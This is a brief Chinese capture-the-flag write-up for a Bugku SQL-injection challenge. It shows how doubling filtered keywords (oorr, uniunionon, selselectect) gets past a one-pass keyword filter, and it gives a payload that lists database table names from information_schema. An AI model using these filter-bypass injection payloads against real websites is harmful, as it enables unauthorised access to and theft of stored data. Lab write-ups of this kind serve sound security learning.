2018-07-27 bugku多次

id=5提示sql注入

尝试id=5' or 1%23 失败，id=5' | 1%23可以

再尝试id=5' oorr 1%23可以，应发现or，union，select，and被过滤了一次，

试了几次发现id=-1' uniunionon selselectect 1,2%23回显2，但是想通information_schema.tables爆表名一直错误，卡了半天，发现

长度只有83，

python长度位85，

最后发现information里面有个or被过滤了，导致一直报错hhh，好坑啊

改成

7' uniunionon seselectlect 1,(selecselectt group_concat(table_name) from infoorrmation_schema.tables where table_schema=database())%23

即可

之后查列名的and也要记得双写

第二个网站直接报错注入即可